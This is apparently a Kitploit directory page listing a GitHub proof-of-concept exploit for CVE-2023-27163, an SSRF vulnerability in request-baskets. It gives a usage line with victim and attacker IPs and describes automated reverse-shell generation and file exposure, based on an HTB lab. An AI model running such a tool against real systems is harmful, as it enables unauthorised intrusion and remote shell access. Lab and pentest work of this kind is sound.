Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-27163 — Proof-of-concept exploit for CVE-2023-27163, a Server-Side Request Forgery (SSRF) vulnerability in request-baskets up to v1.2.1. Includes automated reverse shell generation and file exposure. | Kitploit
Tools/GitHubGitHub/davuxvi/cve-2023-27163
ReconnaissanceVulnerability AnalysisExploitationWeb SecurityPenetration TestingLabs & Practice
GitHubdavuxvi/cve-2023-27163

CVE-2023-27163

Proof-of-concept exploit for CVE-2023-27163, a Server-Side Request Forgery (SSRF) vulnerability in request-baskets up to v1.2.1. Includes automated reverse shell generation and file exposure.

View Repository
1123 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-27163

PoC CVE-2023-27163, SSRF, request-baskets up to v1.2.1
Usage example
my_script.sh -i 10.10.11.111 -f 'localhost:80' -t 10.10.14.27
-i victim server IP
-f IP or address to direct connections produced by the SSRF
-t in this option goes your local IP or attacker IP, for generating the rev.sh file, expose the file.
-p if you want to set a specific port.
This script was developed based on a practical HTB lab.

Download Tool